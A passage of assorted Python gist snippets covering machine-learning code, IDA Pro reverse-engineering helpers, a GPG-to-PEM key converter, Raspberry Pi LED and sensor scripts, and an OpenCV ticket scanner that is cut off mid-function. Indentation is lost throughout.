for batch_idx, (x, target) in enumerate(train_loader):
optimizer.zero_grad()
x, target = Variable(x.cuda()), Variable(target.cuda())
_, loss = model(x, target)
loss.backward()
optimizer.step()
if batch_idx % 100 == 0:
print '==>>> epoch: {}, batch index: {}, train loss: {:.6f}'.format(epoch, batch_idx, loss.data[0])
# testing
correct_cnt, ave_loss = 0, 0
for batch_idx, (x, target) in enumerate(test_loader):
x, target = Variable(x.cuda(), volatile=True), Variable(target.cuda(), volatile=True)
score, loss = model(x, target)
_, pred_label = torch.max(score.data, 1)
correct_cnt += (pred_label == target.data).sum()
ave_loss += loss.data[0]
accuracy = correct_cnt*1.0/len(test_loader)/batch_size
ave_loss /= len(test_loader)
print '==>>> epoch: {}, test loss: {:.6f}, accuracy: {:.4f}'.format(epoch, ave_loss, accuracy)
torch.save(model.state_dict(), model.name())
```
#### File: hard-gists/b3143dde185cecda7c1dee7ffbce5d2c/snippet.py
```python
__VERSION__ = '0.1'
__AUTHOR__ = '@herrcore'
PLUGIN_NAME = "Quick IOCTL Decoder"
PLUGIN_HOTKEY = 'Ctrl-Alt-I'
import idaapi
class IOCTL_Decoder():
DEVICE = [None]*55
DEVICE[1]="BEEP"
DEVICE[2]="CD_ROM"
DEVICE[3]="CD_ROM_FILE_SYSTEM"
DEVICE[4]="CONTROLLER"
DEVICE[5]="DATALINK"
DEVICE[6]="DFS"
DEVICE[7]="DISK"
DEVICE[8]="DISK_FILE_SYSTEM"
DEVICE[9]="FILE_SYSTEM"
DEVICE[10]="INPORT_PORT"
DEVICE[11]="KEYBOARD"
DEVICE[12]="MAILSLOT"
DEVICE[13]="MIDI_IN"
DEVICE[14]="MIDI_OUT"
DEVICE[15]="MOUSE"
DEVICE[16]="MULTI_UNC_PROVIDER"
DEVICE[17]="NAMED_PIPE"
DEVICE[18]="NETWORK"
DEVICE[19]="NETWORK_BROWSER"
DEVICE[20]="NETWORK_FILE_SYSTEM"
DEVICE[21]="NULL"
DEVICE[22]="PARALLEL_PORT"
DEVICE[23]="PHYSICAL_NETCARD"
DEVICE[24]="PRINTER"
DEVICE[25]="SCANNER"
DEVICE[26]="SERIAL_MOUSE_PORT"
DEVICE[27]="SERIAL_PORT"
DEVICE[28]="SCREEN"
DEVICE[29]="SOUND"
DEVICE[30]="STREAMS"
DEVICE[31]="TAPE"
DEVICE[32]="TAPE_FILE_SYSTEM"
DEVICE[33]="TRANSPORT"
DEVICE[34]="UNKNOWN"
DEVICE[35]="VIDEO"
DEVICE[36]="VIRTUAL_DISK"
DEVICE[37]="WAVE_IN"
DEVICE[38]="WAVE_OUT"
DEVICE[39]="8042_PORT"
DEVICE[40]="NETWORK_REDIRECTOR"
DEVICE[41]="BATTERY"
DEVICE[42]="BUS_EXTENDER"
DEVICE[43]="MODEM"
DEVICE[44]="VDM"
DEVICE[45]="MASS_STORAGE"
DEVICE[46]="SMB"
DEVICE[47]="KS"
DEVICE[48]="CHANGER"
DEVICE[49]="SMARTCARD"
DEVICE[50]="ACPI"
DEVICE[51]="DVD"
DEVICE[52]="FULLSCREEN_VIDEO"
DEVICE[53]="DFS_FILE_SYSTEM"
DEVICE[54]="DFS_VOLUME"
def __init__(self, control_code):
self.control_code = control_code
def decode(self):
out={}
device_val = (self.control_code >> 16) & 0xFFF
funcVal = (self.control_code >> 2) & 0xFFF
if (device_val <= 54) and (device_val != 0):
device_string = self.DEVICE[device_val]+ " ("+hex(device_val)+")"
else:
device_string = hex(device_val)
function_string = hex(funcVal)
out["device"] = device_string
out["function"] = function_string
access = (self.control_code >> 14) & 3
method = self.control_code & 3
access_string = ""
if access == 0:
access_string = "FILE_ANY_ACCESS"
elif access == 1:
access_string = "FILE_READ_ACCESS"
elif access == 2:
access_string = "FILE_WRITE_ACCESS"
elif access == 3:
access_string = "Read and Write"
method_string = ""
if method == 0:
method_string = "METHOD_BUFFERED"
elif method == 1:
method_string = "METHOD_IN_DIRECT"
elif method == 2:
method_string = "METHOD_OUT_DIRECT"
elif method == 3:
method_string = "METHOD_NEITHER"
out["access"] = access_string
out["method"] = method_string
return out
class IDAIOCTLDecoder():
@staticmethod
def decode():
ea = ScreenEA()
if ea == idaapi.BADADDR:
idaapi.msg(PLUGIN_NAME + " ERROR: Could not get get_screen_ea()")
return
str_id = idaapi.get_highlighted_identifier()
if not str_id:
idaapi.msg(PLUGIN_NAME + " ERROR: No Ioctl Code highlighted!")
return
try:
if str_id[-1] == 'h':
code = int(str_id[:-1], 16)
elif str_id[-1] == 'o':
code = int(str_id[:-1], 8)
elif str_id[-1] == 'b':
code = int(str_id[:-1], 2)
else:
code = int(str_id)
except ValueError:
idaapi.msg(PLUGIN_NAME + " ERROR: Not a valid Ioctl Code: " + str(str_id))
return
try:
decoder = IOCTL_Decoder(code)
ioctl_data = decoder.decode()
#print decoded IOCTL to cli
msg_string = "That IOCTL decodes to: \n\tDevice: %s \n\tFunction: %s \n\tAccess: %s \n\tMethod: %s"
idaapi.msg(msg_string % (ioctl_data["device"], ioctl_data["function"], ioctl_data["access"], ioctl_data["method"]))
#add decoded IOCTL as comment
comment_string = "dwIoControlCode: \n\t\tDevice: %s \n\t\tFunction: %s \n\t\tAccess: %s \n\t\tMethod: %s"
idaapi.set_cmt(ea, comment_string % (ioctl_data["device"], ioctl_data["function"], ioctl_data["access"], ioctl_data["method"]), 0)
except Exception as e:
idaapi.msg(PLUGIN_NAME + " ERROR: " + str(e))
return
class IOCTLDecodeHandler(idaapi.action_handler_t):
def activate(self, ctx):
IDAIOCTLDecoder.decode()
def update(self, ctx):
return idaapi.AST_ENABLE_ALWAYS
class QuickIOCTLDecoderHooks(idaapi.UI_Hooks):
def finish_populating_tform_popup(self, form, popup):
tft = idaapi.get_tform_type(form)
if tft == idaapi.BWN_DISASM:
# Note the 'None' as action name (1st parameter).
# That's because the action will be deleted immediately
# after the context menu is hidden anyway, so there's
# really no need giving it a valid ID.
desc = idaapi.action_desc_t(None, 'Decode IOCTL', IOCTLDecodeHandler())
idaapi.attach_dynamic_action_to_popup(form, popup, desc, None)
class QuickIOCTLDecoder(idaapi.plugin_t):
flags = idaapi.PLUGIN_UNL
comment = "Decode IOCTL codes!"
help = "Highlight IOCTL and right-click 'Decode IOCTL'"
wanted_name = PLUGIN_NAME
wanted_hotkey = PLUGIN_HOTKEY
def init(self):
idaapi.msg("Initializing: %s\n" % PLUGIN_NAME)
global hooks
hooks = QuickIOCTLDecoderHooks()
re = hooks.hook()
return idaapi.PLUGIN_OK
def run(self, arg):
IDAIOCTLDecoder.decode()
pass
def term(self):
pass
def PLUGIN_ENTRY():
return QuickIOCTLDecoder()
```
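The `IOCTL_Decoder` class itself has no IDA dependency, so it can be sanity-checked outside IDA with any control code (the value below is arbitrary):
```python
# Decode an arbitrary IOCTL control code without IDA.
info = IOCTL_Decoder(0x0022C004).decode()
for field in ("device", "function", "access", "method"):
    print("%s: %s" % (field, info[field]))
```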
#### File: hard-gists/b45983f227f1e4fbea65b6e06abfdecc/snippet.py
```python
from keras.engine.topology import Layer
from keras import initializations
from keras import backend as K
class Attention(Layer):
'''Attention operation for temporal data.
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
'''
def __init__(self, attention_dim, **kwargs):
self.init = initializations.get('glorot_uniform')
self.attention_dim = attention_dim
super(Attention, self).__init__(**kwargs)
def build(self, input_shape):
self.W = self.init((self.attention_dim, self.attention_dim),
name='{}_W'.format(self.name))
self.b = K.zeros((self.attention_dim,), name='{}_b'.format(self.name))
self.u = self.init((self.attention_dim,), name='{}_u'.format(self.name))
self.trainable_weights += [self.W, self.b, self.u]
self.built = True
def get_output_shape_for(self, input_shape):
return (input_shape[0], input_shape[2])
def call(self, x, mask=None):
# Calculate the first hidden activations
a1 = K.tanh(K.dot(x, self.W) + self.b) # [n_samples, n_steps, n_hidden]
# K.dot won't let us dot a 3D with a 1D so we do it with mult + sum
mul_a1_u = a1 * self.u # [n_samples, n_steps, n_hidden]
dot_a1_u = K.sum(mul_a1_u, axis=2) # [n_samples, n_steps]
# Calculate the per step attention weights
a2 = K.softmax(dot_a1_u)
a2 = K.expand_dims(a2) # [n_samples, n_steps, 1] so div broadcasts
# Apply attention weights to steps
weighted_input = x * a2 # [n_samples, n_steps, n_features]
# Sum across the weighted steps to get the pooled activations
return K.sum(weighted_input, axis=1)
```
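A sketch of how the layer above would typically be used in a Keras 1.x model, after a recurrent layer that returns full sequences (all sizes are arbitrary; `attention_dim` must match the feature dimension of the incoming sequence):
```python
from keras.models import Sequential
from keras.layers import Embedding, GRU, Dense

model = Sequential()
model.add(Embedding(input_dim=20000, output_dim=128, input_length=100))
model.add(GRU(64, return_sequences=True))   # (samples, steps, 64)
model.add(Attention(64))                    # pools steps -> (samples, 64)
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy')
```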
#### File: hard-gists/b493a228c4081ff0260b/snippet.py
```python
from django.core.files import File
from django.core.files.temp import NamedTemporaryFile
import requests
import urlparse
def save_image_from_url(field, url):
r = requests.get(url)
if r.status_code == requests.codes.ok:
img_temp = NamedTemporaryFile(delete = True)
img_temp.write(r.content)
img_temp.flush()
img_filename = urlparse.urlsplit(url).path[1:]
field.save(img_filename, File(img_temp), save = True)
return True
return False
```
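For illustration, assuming a Django app with a hypothetical model that has an `ImageField` named `photo`:
```python
# Hypothetical models.py entry (model and field names are illustrative only).
from django.db import models

class Profile(models.Model):
    photo = models.ImageField(upload_to='profiles/')

# Then, with an existing row:
# profile = Profile.objects.get(pk=1)
# save_image_from_url(profile.photo, 'https://example.com/avatar.jpg')
```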
#### File: hard-gists/b6e374d172bbe3e6130f6849e7bd6c13/snippet.py
```python
import nltk
import pandas as pd
import re
import pprint
import operator
import csv
import logging
from stop_words import get_stop_words
from collections import defaultdict
from gensim import corpora
from gensim.models import ldamodel
from nltk.stem import WordNetLemmatizer
# constants
STOPWORDS = set(get_stop_words('en'))
CUSTOM_STOPWORDS = {'light', 'lights', 'sky', 'object', 'bright', 'ufo', 'quot'}
pp = pprint.PrettyPrinter(indent=4)
regex_filter = re.compile('[a-z]{2,}')
# put your custom path here if you so choose
nltk.data.path.append('')
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def tokenize_and_clean(document, stopwords=(), regex=[], lemmatizer=WordNetLemmatizer()):
"""
:param document: a string representing a single document
:param stopwords: a set of stopwords
:param regex: additional regular expressions to use as a filter. Assuming these are compiled prior
:param lemmatizer: an instance of an nltk lemmatizer
:return: a tokenized and filtered document
"""
raw_tokenized = nltk.tokenize.wordpunct_tokenize(document)
tokenized = []
for word in raw_tokenized:
w = word.lower()
if w not in stopwords:
for exp in regex:
if re.match(exp,w):
if lemmatizer:
tokenized.append(lemmatizer.lemmatize(w))
else:
tokenized.append(w)
return tokenized
def word_frequency(corpus=[[]]):
"""
:param corpus: a list of lists representing tokenized documents
:return: a dict containing the frequency of each word in the corpus
"""
frequency = defaultdict(int)
for doc in corpus:
for w in doc:
frequency[w] += 1
return dict(sorted(frequency.items(), key=operator.itemgetter(1), reverse=True))
def write_dict_to_csv(data, filepath):
"""
Encapsulating this in a function - writes an object to a csv
:param data: a dict containing your data
:param filepath: the filepath for your csv file
"""
with open(filepath, 'wb') as csv_file:
writer = csv.writer(csv_file)
        for key, value in data.items():
writer.writerow([key, value])
# reading in the raw file - there are other interesting data that we won't analyze at this time
raw = pd.read_csv('./data/raw.csv', usecols=[7], names=['description'])
# a dict for our document corpus
corpus = []
for i, row in raw.iterrows():
corpus.append(row[0])
tokenized_corpus = []
for doc in corpus:
try:
tokenized_corpus.append(tokenize_and_clean(document=doc, stopwords=STOPWORDS.union(CUSTOM_STOPWORDS), regex=[regex_filter]))
except:
pass
freq = word_frequency(tokenized_corpus)
# filtering words based off of low frequency < 10 instances (mispellings, rare words) and removing
# high frequency words that don't provide a lot of discrimination between documents
tokenized_final = [[token for token in doc if freq[token] > 10] for doc in tokenized_corpus]
# creating a vocabulary of words from this corpus for streaming use
vocabulary = corpora.Dictionary(tokenized_final)
# save to disk
vocabulary.save('data/vocabulary.dict')
print(vocabulary)
# creating an mm corpus
corpus = [vocabulary.doc2bow(text) for text in tokenized_final]
corpora.MmCorpus.serialize('data/ufo.mm', corpus)
ufo_corpus = corpora.MmCorpus('data/ufo.mm')
lda = ldamodel.LdaModel(corpus=ufo_corpus,alpha='auto', id2word=vocabulary, num_topics=20, update_every=0, passes=20)
with open('data/lda_topics', 'w') as file:
file.write(str(lda.print_topics(-1)))
lda.print_topics(-1)
```
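Once the model is trained, scoring a new report against the learned topics is a one-liner; a quick sketch using the helpers defined above (the sample sentence is made up):
```python
# Score a new (hypothetical) sighting report against the trained topics.
new_doc = "orange glowing disc hovering silently over the highway"
tokens = tokenize_and_clean(new_doc, stopwords=STOPWORDS.union(CUSTOM_STOPWORDS), regex=[regex_filter])
bow = vocabulary.doc2bow(tokens)
print(lda[bow])  # list of (topic_id, probability) pairs
```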
#### File: hard-gists/b76261844db0255899ba857838a7c201/snippet.py
```python
from objc_util import ObjCClass, on_main_thread
UIDebuggingInformationOverlay = ObjCClass('UIDebuggingInformationOverlay')
@on_main_thread
def toggle_overlay():
UIDebuggingInformationOverlay.prepareDebuggingOverlay()
UIDebuggingInformationOverlay.overlay().toggleVisibility()
toggle_overlay()
```
#### File: hard-gists/b9df49cfc1540bc8b896/snippet.py
```python
from pgp.packets import constants
from pgp.packets import parsers
from Crypto.PublicKey import RSA
import sys
"""
Converts a GnuPG key to a PEM key.
If the input is password protected, the same password will be used to protect
the PEM output.
"""
def convert(keyid, passphrase, infh, outfh):
packets = parsers.parse_binary_packet_stream(infh)
for packet in packets:
if packet.type == constants.SECRET_KEY_PACKET_TYPE or packet.type == constants.SECRET_SUBKEY_PACKET_TYPE:
print('found key id', packet.key_id)
if packet.key_id != keyid:
continue
if passphrase is not None:
print('decrypting key', packet.key_id)
packet.decrypt(passphrase)
print('creating PEM')
rsa = RSA.construct((packet.modulus, packet.exponent, packet.exponent_d, packet.prime_p, packet.prime_q, packet.multiplicative_inverse_u))
pem = rsa.exportKey('PEM', passphrase, 1)
outfh.write(pem)
return
elif packet.type == constants.PUBLIC_KEY_PACKET_TYPE or packet.type == constants.PUBLIC_SUBKEY_PACKET_TYPE:
print('found public key id', packet.key_id)
if packet.key_id != keyid:
continue
print('creating PEM')
rsa = RSA.construct((packet.modulus, packet.exponent))
pem = rsa.exportKey('PEM')
outfh.write(pem)
return
print('key not found')
def main(argv):
if (len(argv) < 3):
print('usage: gpg_to_pem.py keyid input.gpg output.pem [passphrase]')
return
with open(argv[1], 'rb') as infh:
with open(argv[2], 'wb') as outfh:
passphrase = bytes(argv[3], 'ascii') if len(argv) > 3 else None
convert(argv[0].upper(), passphrase, infh, outfh)
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: hard-gists/badd18a84b236c9e6c34057512cb569a/snippet.py
```python
import unicornhat as unicorn
from random import randint
import time, math, colorsys
import os, sys, subprocess, threading
# Initialization
unicorn.set_layout(unicorn.AUTO)
unicorn.rotation(0)
unicorn.brightness(0.35) # Tune to your preferences.
width,height=unicorn.get_shape()
# Line number for where each function will begin
function_pos = {}
# Store values for multithreaded fetching functions.
function_values = {}
def main(display_function, bar_functions, time_limit=None):
""" The main display function. Uses function_pos to assign parts of the display to
bar functions and display functions.
Args:
display_function (func): A function intended to take up the majority of the HAT's
display. Should limit display area with the use of function_pos.
bar_functions (func): A list of single-row "bars". Again, assign position with the
use of function_pos.
time_limit (int): How long to wait before quitting (in seconds).
"""
if bar_functions is not None:
for index, bar_function in enumerate(bar_functions):
function_pos[bar_function] = width - index - 1
if display_function is not None:
function_pos[display_function] = width - len(bar_functions) - 1
else:
function_pos[display_function] = width - 1
threads = [threading.Thread(target=function) for function in function_pos.keys()]
for thread in threads:
thread.start()
if time_limit is not None:
time.sleep(time_limit)
print("Time limit reached!")
os._exit(3)
######################################################################
####################### ##########################
####################### BAR FUNCTIONS ##########################
####################### ##########################
######################################################################
####################### INTERNET BAR ##########################
def internet_color(update_rate=5):
""" Color bar - tests internet connectivity. Displays white if connected;
orange if not.
Args:
update_rate (float): seconds to wait before checking connectivity again
"""
# Ping a Google DNS server to check for internet connectivity.
while True:
ping_response = subprocess.Popen(["/bin/ping", "-c1", "-w100", "8.8.8.8"], stdout=subprocess.PIPE).stdout.read()
if "1 received" in str(ping_response):
moving_pixel(function_pos[internet_color], (0, 255, 255), (255, 255, 255))
else:
moving_pixel(function_pos[internet_color], (255, 255, 255), (255, 127, 80))
unicorn.show()
time.sleep(update_rate)
def color_bar(position, color):
""" Display a single, static bar of ```color``` in ```position```.
Args:
position (int): the width index at which to display the bar
color (int tuple): (R, G, B) tuple of the RGB color to be displayed
"""
for height_index in range(height):
unicorn.set_pixel(position, height_index, *color)
return
def moving_pixel(position, color, background, speed=0.1, direction="right"):
""" Display a right-moving pixel of color ```color``` on a color bar with
color ```background``` in position ```position.```
Args:
position (int): The width index at which to display the bar animation
color (int tuple): (R, G, B) tuple of the moving pixel's color
background (int tuple): (R, G, B) tuple of the background color
speed (float): how often to wait between pixel movements
direction (string, "left" or "right"): the direction the pixel
should move, with "right" being towards the USB ports
"""
for height_index in range(height):
color_bar(position, background)
if direction == "right":
unicorn.set_pixel(position, height_index, *color)
if direction == "left":
unicorn.set_pixel(position, height - height_index - 1, *color)
unicorn.show()
time.sleep(speed)
color_bar(position, background)
unicorn.show()
######################################################################
####################### ##########################
####################### FETCHER FUNCTIONS ##########################
####################### ##########################
######################################################################
def load_fetcher(update_rate=5):
""" Get the load of the system and modify the relevant dictionary
with the new load value.
Args:
update_rate (float): seconds to wait before fetching load value
"""
while True:
function_values[load_fetcher] = os.getloadavg()[0]
time.sleep(update_rate)
def random_color():
""" Generate a random RGB color.
Returns:
int tuple: (R, G, B) values
"""
r, g, b = randint(0, 255), randint(0, 255), randint(0, 255)
return (r, g, b)
######################################################################
####################### ##########################
####################### DISPLAY FUNCTIONS ##########################
####################### ##########################
######################################################################
####################### LOAD SPARKLES ##########################
def load_sparkles(color_function=None, update_rate=5):
""" Fill the rest of the area with randomly-positioned sparkles.
Frequency of sparkling increases with load^2 (for load>1).
Args:
color_function (func): Define a custom function for the
sparkles' color, instead of a random rainbow.
update_rate (float): How often to refresh system load value (seconds).
"""
color_function = random_color if color_function is None else color_function
def random_pixel(color_function):
""" Generate a randomly positioned pixel with the color returned
by color_function.
Args:
color_function (func): Should return a (R,G,B) color value.
"""
color = color_function()
def random_position():
""" Get the position of a random pixel bound by
function_pos. """
x = randint(0, function_pos[load_sparkles])
y = randint(0, (height-1))
return (x,y)
selected_pixel = random_position()
''' Aesthetic: If the randomly generated pixel is currently lit,
turn it off and try with a new pixel. Also works as sort of a
population control on how many pixels will be lit. '''
while sum(unicorn.get_pixel(*selected_pixel)) > 0:
unicorn.set_pixel(*(selected_pixel + (0, 0, 0)))
selected_pixel = random_position()
unicorn.set_pixel(*(selected_pixel + color))
return
''' Sparkle with a frequency based off of the computer's current
load. Fetch load value every update_rate seconds.'''
function_values[load_fetcher] = 1
threading.Thread(target=load_fetcher).start()
while True:
tick = 1
if function_values[load_fetcher] > 1:
tick = 1/(function_values[load_fetcher]**2) if function_values[load_fetcher] < 12 else 1/144
for i in range(int(update_rate/tick)):
random_pixel(color_function)
unicorn.show()
time.sleep(tick)
####################### LOAD RAINBOW ##########################
def load_rainbow(update_rate=5):
""" A lightly modified version of Pimeroni's "rainbow" example.
Displays a moving rainbow of colors that increases with load.
Args:
update_rate (float): How often to update the load value (seconds).
"""
i = 0.0
offset = 30
function_values[load_fetcher] = 1
threading.Thread(target=load_fetcher).start()
while True:
load_function = function_values[load_fetcher]/10 if function_values[load_fetcher] <= 10 else 10
for w in range(int(update_rate/0.01)):
i = i + load_function
for y in range(height):
for x in range(function_pos[load_rainbow] + 1):
r = 0#x * 32
g = 0#y * 32
xy = x + y / 4
r = (math.cos((x+i)/2.0) + math.cos((y+i)/2.0)) * 64.0 + 128.0
g = (math.sin((x+i)/1.5) + math.sin((y+i)/2.0)) * 64.0 + 128.0
b = (math.sin((x+i)/2.0) + math.cos((y+i)/1.5)) * 64.0 + 128.0
r = max(0, min(255, r + offset))
g = max(0, min(255, g + offset))
b = max(0, min(255, b + offset))
unicorn.set_pixel(x,y,int(r),int(g),int(b))
unicorn.show()
time.sleep(0.01)
####################### LOAD MATRIX ##########################
def load_matrix(update_rate=5):
""" A heavily modified version of Pimeroni's "cross" example.
Speed increases with n*load^2.
Args:
update_rate (float): seconds to wait before updating load value
"""
points = []
edge_pixels = []
class LightPoint:
def __init__(self):
self.direction = randint(1, 4)
if self.direction == 1:
self.x = randint(0, function_pos[load_matrix])
self.y = 0
elif self.direction == 2:
self.x = 0
self.y = randint(0, height - 1)
elif self.direction == 3:
self.x = randint(0, function_pos[load_matrix])
self.y = height - 1
else:
self.x = function_pos[load_matrix] - 1
self.y = randint(0, height - 1)
self.colour = []
for i in range(0, 3):
self.colour.append(randint(100, 255))
self.oldxy = (self.x, self.y)
def update_positions():
for point in points:
# Any point already at an edge has been in display at this
# edge for ```tick``` seconds already, so we delete it.
check_edges(point)
point.oldxy = (point.x, point.y)
if point.direction == 1:
point.y += 1
elif point.direction == 2:
point.x += 1
elif point.direction == 3:
point.y -= 1
else:
point.x -= 1
# Delete points that would cause a boundary violation after
# the above coordinate update.
check_boundaries(point)
unicorn.show()
def plot_points():
for point in points:
unicorn.set_pixel(point.x, point.y, point.colour[0], point.colour[1], point.colour[2])
unicorn.set_pixel(*(point.oldxy + (0, 0, 0)))
unicorn.show()
def check_edges(point):
""" Deletes points that have reached an edge.
Args:
point (LightPoint): The point that has reached an edge.
"""
        if (point.x == function_pos[load_matrix] and point.direction == 2) \
                or (point.x == 0 and point.direction == 4) \
                or (point.y == 0 and point.direction == 3) \
                or (point.y == height - 1 and point.direction == 1):
unicorn.set_pixel(point.x, point.y, 0, 0, 0)
points.remove(point)
def check_boundaries(point):
""" Deletes points beyond allowed boundaries.
Args:
point (LightPoint): The point to check for boundary violations.
"""
        if (point.x > function_pos[load_matrix] and point.direction == 2) \
                or (point.x < 0 and point.direction == 4) \
                or (point.y < 0 and point.direction == 3) \
                or (point.y > height - 1 and point.direction == 1):
if point in points:
points.remove(point)
function_values[load_fetcher] = 1
threading.Thread(target=load_fetcher).start()
tick_func = lambda load: 0.5/(load**2) if load > 1 else 1/4
max_points = function_pos[load_matrix]*height/3
while True:
tick = tick_func(function_values[load_fetcher]) if function_values[load_fetcher] < 12 else tick_func(12)
for w in range(int(update_rate/tick)):
if len(points) < max_points and randint(0, 5) > 1:
points.append(LightPoint())
update_positions()
plot_points()
time.sleep(tick)
if __name__ == "__main__":
main(load_matrix, (internet_color,))
```
#### File: hard-gists/bce94f1c37215f644e0c/snippet.py
```python
from idaapi import *
def extract_reg(line, cx):
linelen = len(line)
if cx >= linelen:
return
walker_cx = 0
byte_idx = 0
last_reg_start_idx = None
while walker_cx <= cx and byte_idx < linelen:
cur = line[byte_idx]
# print "byte_idx=%d, walker_cx=%d, cur=%d (%s)" % (byte_idx, walker_cx, ord(cur), "N/A" if ord(cur) < 32 or ord(cur) > 122 else cur)
if cur == COLOR_ON:
if ord(line[byte_idx + 1]) == COLOR_REG:
last_reg_start_idx = byte_idx + 2
byte_idx += 2
elif cur == COLOR_OFF:
if ord(line[byte_idx + 1]) == COLOR_REG:
last_reg_start_idx = None
byte_idx += 2
else:
byte_idx += 1
walker_cx += 1
if last_reg_start_idx:
last_reg_end_idx = last_reg_start_idx
while line[last_reg_end_idx] != COLOR_OFF and last_reg_end_idx < linelen:
last_reg_end_idx += 1
return line[last_reg_start_idx:last_reg_end_idx]
class MyWrapper(IDAViewWrapper):
def __init__(self, title):
IDAViewWrapper.__init__(self, title)
def OnViewClick(self, px, py, state):
widget = pycim_get_tcustom_control(self)
from_mouse = False
# get current line
line = get_custom_viewer_curline(widget, from_mouse)
# get current X, Y in rows&columns space (as opposed to pixel space)
_, cx, cy = get_custom_viewer_place(widget, from_mouse)
reg = extract_reg(line, cx)
if reg:
print "Register: '%s'" % reg
W = MyWrapper("IDA View-A")
if not W.Bind():
print "Binding failed!"
```
#### File: hard-gists/bce98c5c1688fc833475/snippet.py
```python
import argparse
from datetime import datetime
import logging
import signal
import sys
from threading import Timer
from time import time
from onewire import Onewire
from influxdb import client as influxdb
def int_signal_handler(signal, frame):
logging.info("interrupt detected")
sys.exit(0)
signal.signal(signal.SIGINT, int_signal_handler)
class ServiceLocation(object):
def __init__(self, hostname, port=None):
self.hostname = hostname
self.port = port
class ServiceLocationAction(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs is not None and nargs != 1:
raise ValueError("Only one argument is allowed for a service location.")
super(ServiceLocationAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
if ":" in values:
hostname, port = values.split(":", 1)
port = int(port)
setattr(namespace, self.dest, ServiceLocation(hostname, port))
else:
hostname = values
setattr(namespace, self.dest, ServiceLocation(hostname))
class InfluxDatabaseWriter(object):
def __init__(self, location, name):
self._client = influxdb.InfluxDBClient(location.hostname, location.port)
self._client.switch_database(name)
def write(self, datum):
self._client.write_points([{
"measurement": datum.measurement,
"tags": {},
"time": datum.time.isoformat(),
"fields": {"value": datum.value}}])
class OneWireTemperatureSensor(object):
def __init__(self, location, identifier):
ow = Onewire("{hostname:s}:{port:d}".format(
hostname=location.hostname, port=location.port))
self._sensor = ow.sensor(identifier)
@property
def type(self):
return self._sensor.sensor_type
@property
def identifier(self):
return self._sensor.path
@property
def temperature(self):
temperature = self._sensor.read("temperature")
if temperature:
return float(temperature)
else:
return None
class TimeSeriesDatum(object):
def __init__(self, measurement, value):
self.time = datetime.utcnow()
self.measurement = measurement
self.value = value
class Repeater(object):
def __init__(self, interval, function, *args):
self._interval = interval
self._function = function
self._arguments = args
def __call__(self):
self._start_timer()
self._call_function()
def _call_function(self):
self._function(*self._arguments)
def _start_timer(self):
# align the execution of the function with the next multiple of
# the delay interval from the original start time
interval = self._interval
start_seconds = self._start_seconds
delay_seconds = interval - ((time() - start_seconds) % interval)
Timer(delay_seconds, self).start()
def start(self):
self._start_seconds = time()
self._start_timer()
self._call_function()
def read_temperature(sensor, database):
temperature = sensor.temperature
if temperature is not None:
datum = TimeSeriesDatum("temp", temperature)
database.write(datum)
logging.info("temperature is {value:f} °C [{time!s}]".format(
value=datum.value, time=datum.time))
else:
logging.warning("could not convert temperature \"{value:s}\"".format(
value=temperature))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="read temperatures from a OneWire sensor")
parser.add_argument("device", type=str, help="device ID")
parser.add_argument("-I", "--influx", type=str, default="localhost",
help="InfluxDB hostname (default: %(default)s",
action=ServiceLocationAction),
parser.add_argument("-D", "--database", type=str, default=None,
help="InfluxDB database name"),
parser.add_argument("-H", "--host", type=str, default="localhost:4304",
help="owserver hostname (default: %(default)s)",
action=ServiceLocationAction),
parser.add_argument("-d", "--delay", type=int, default=1,
help="delay between sensor readings in seconds (default: %(default)d)")
args = parser.parse_args()
logging.basicConfig(level=logging.INFO)
database = InfluxDatabaseWriter(args.influx, args.database)
logging.info("connected to InfluxDB server at {hostname:s}:{port:d}".format(
hostname=args.influx.hostname, port=args.influx.port))
sensor = OneWireTemperatureSensor(args.host, args.device)
logging.info("connected to OneWire server at {hostname:s}:{port:d}".format(
hostname=args.host.hostname, port=args.host.port))
logging.info("found device {identifier:s} (type = {type:s})".format(
identifier=sensor.identifier, type=sensor.type))
Repeater(args.delay, read_temperature, sensor, database).start()
```
#### File: hard-gists/be7e84c9d61c4869e981/snippet.py
```python
import cv2
import sys
import numpy
from matplotlib import pyplot as plt
from scipy.spatial import distance
"""
OpenCV program to extract ticket stub images from photographs,
via automatic perspective correction for quadrilateral objects.
Intended for use prior to running through OCR.
Developed for the website http://stub.town by <NAME>
Based in large part on Python port of ScannerLite
https://gist.github.com/scturtle/9052852
original C++
https://github.com/daisygao/ScannerLite
Also incorporates ideas from:
http://opencv-code.com/tutorials/automatic-perspective-correction-for-quadrilateral-objects/
http://www.pyimagesearch.com/2015/04/06/zero-parameter-automatic-canny-edge-detection-with-python-and-opencv/
"""
class Line:
"""
A line object
"""
def __init__(self, l):
self.point = l
x1, y1, x2, y2 = l
self.c_x = (x1 + x2) / 2
self.c_y = (y1 + y2) / 2
def show(image):
"""
Show any image.
"""
msg = 'press any key to continue'
cv2.namedWindow(msg, cv2.WINDOW_NORMAL)
cv2.imshow(msg, image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def auto_canny(image, sigma=0.33):
"""
Get edges of an image
image: grayscale and blurred input image
edged: canny edge output image
"""
# compute the median of the single channel pixel intensities
v = numpy.median(image)
# apply automatic Canny edge detection using the computed median
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(image, lower, upper)
# return the edged image
return edged
def intersection(l1, l2):
"""
Compute intersect point of two lines l1 and l2
l1: line
l2: line
return: Intersect Point
"""
x1, y1, x2, y2 = l1.point
x3, y3, x4, y4 = l2.point
a1, b1 = y2 - y1, x1 - x2
c1 = a1 * x1 + b1 * y1
a2, b2 = y4 - y3, x3 - x4
c2 = a2 * x3 + b2 * y3
det = a1 * b2 - a2 * b1
assert det, "lines are parallel"
return (1. * (b2 * c1 - b1 * c2) / det, 1. * (a1 * c2 - a2 * c1) / det)
def scanCrop(image, debug=False):
"""
Do the whole scanning thing.
image: input image
return: output image, cropped and perspective corrected
"""
# resize input image to img_proc to reduce computation
h, w = image.shape[:2]
min_w = 300
scale = min(10., w * 1. / min_w)
h_proc = int(h * 1. / scale)
